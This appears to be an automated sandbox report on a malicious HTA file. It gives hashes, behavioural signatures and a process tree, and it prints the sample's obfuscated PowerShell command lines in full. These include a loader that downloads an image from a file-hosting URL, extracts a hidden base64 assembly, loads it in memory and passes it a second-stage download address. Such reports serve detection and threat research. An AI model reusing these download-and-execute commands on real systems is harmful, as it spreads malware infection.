Analysis
max time kernel: 120s
max time network: 126s
platform: windows7_x64
resource: win7-20241010-en
resource tags: arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
submitted: 18-11-2024 15:46
Static task: static1
Behavioral task: behavioral1
  Sample: seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta
  Resource: win7-20241010-en
Behavioral task: behavioral2
  Sample: seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta
  Resource: win10v2004-20241007-en
General
Target: seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta
Size: 178KB
MD5: 2d71e3e87e2ea2945dcc2571b74fdb43
SHA1: a338df9a850b1c37528e1b517786285c216cf5e0
SHA256: 0557fb02097645b6ec955298be44333a49f07f61dbcfdce99a78038f1cd4c1d4
SHA512: 8e9fca6b445cbec531540059dac5e287cef1e1f53e0c1afde7480e9bba3a0e4f532f7637bbf0dc79c34d179c3524fdccfc87933b00abd117a0437c59807dbeab
SSDEEP: 96:4vCl177OuKTWYEuKTGuC/TVjn0vflihuKTfuKTNAnuKTUQ:4vCld7OTTbETT5C/TCqTTfTTNeTTUQ
Malware Config
Extracted
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
Signatures
Blocklisted process makes network request 3 IoCs
  flow  pid   Process
  3     2260  pOWeRShelL.exe
  6     2232  powershell.exe
  7     2232  powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
  pid   Process
  264   powershell.exe
  2232  powershell.exe
Evasion via Device Credential Deployment 2 IoCs
  pid   Process
  2260  pOWeRShelL.exe
  2940  powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description  ioc                                                          Process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  WScript.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  mshta.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  pOWeRShelL.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  csc.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cvtres.exe

  description  ioc                                                                                                     Process
  Key created  \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main  mshta.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs
  pid   Process
  2260  pOWeRShelL.exe
  2940  powershell.exe
  264   powershell.exe
  2232  powershell.exe
Suspicious use of AdjustPrivilegeToken 4 IoCs
  description              pid   Process
  Token: SeDebugPrivilege  2260  pOWeRShelL.exe
  Token: SeDebugPrivilege  2940  powershell.exe
  Token: SeDebugPrivilege  264   powershell.exe
  Token: SeDebugPrivilege  2232  powershell.exe
Suspicious use of WriteProcessMemory 28 IoCs
  description                       pid   Process         procid_target
  PID 2380 wrote to memory of 2260  2380  mshta.exe       30
  PID 2380 wrote to memory of 2260  2380  mshta.exe       30
  PID 2380 wrote to memory of 2260  2380  mshta.exe       30
  PID 2380 wrote to memory of 2260  2380  mshta.exe       30
  PID 2260 wrote to memory of 2940  2260  pOWeRShelL.exe  32
  PID 2260 wrote to memory of 2940  2260  pOWeRShelL.exe  32
  PID 2260 wrote to memory of 2940  2260  pOWeRShelL.exe  32
  PID 2260 wrote to memory of 2940  2260  pOWeRShelL.exe  32
  PID 2260 wrote to memory of 2784  2260  pOWeRShelL.exe  33
  PID 2260 wrote to memory of 2784  2260  pOWeRShelL.exe  33
  PID 2260 wrote to memory of 2784  2260  pOWeRShelL.exe  33
  PID 2260 wrote to memory of 2784  2260  pOWeRShelL.exe  33
  PID 2784 wrote to memory of 2884  2784  csc.exe         34
  PID 2784 wrote to memory of 2884  2784  csc.exe         34
  PID 2784 wrote to memory of 2884  2784  csc.exe         34
  PID 2784 wrote to memory of 2884  2784  csc.exe         34
  PID 2260 wrote to memory of 2040  2260  pOWeRShelL.exe  36
  PID 2260 wrote to memory of 2040  2260  pOWeRShelL.exe  36
  PID 2260 wrote to memory of 2040  2260  pOWeRShelL.exe  36
  PID 2260 wrote to memory of 2040  2260  pOWeRShelL.exe  36
  PID 2040 wrote to memory of 264   2040  WScript.exe     37
  PID 2040 wrote to memory of 264   2040  WScript.exe     37
  PID 2040 wrote to memory of 264   2040  WScript.exe     37
  PID 2040 wrote to memory of 264   2040  WScript.exe     37
  PID 264 wrote to memory of 2232   264   powershell.exe  39
  PID 264 wrote to memory of 2232   264   powershell.exe  39
  PID 264 wrote to memory of 2232   264   powershell.exe  39
  PID 264 wrote to memory of 2232   264   powershell.exe  39
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta"
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2380
  C:\Windows\SysWOW64\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe
  "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'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'+[chAr]34+'))')))"
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2260
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2940
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fexbibux.cmdline"
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2784
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA17E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA17D.tmp"
      - System Location Discovery: System Language Discovery
      PID:2884
    C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS"
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2040
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      - Command and Scripting Interpreter: PowerShell
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID:264
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F, b4Fdesativadob4'+'F, b4Fdesativadob4F, b4FCasPol'+'b4F, b4Fdesativadob4F, b4Fdesativadob'+'4F,b4Fdesativad'+'ob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob'+'4F,b4F1b4F,b4Fdesativadob4F));').REplaCe('b4F',[sTrIng][CHar]39).REplaCe('sHN','$').REplaCe('s7g','|') |& ( $Pshome[4]+$PSHOmE[30]+'X')"
        - Blocklisted process makes network request
        - Command and Scripting Interpreter: PowerShell
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID:2232
Network
MITRE ATT&CK Enterprise v15
Downloads
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize: 7KB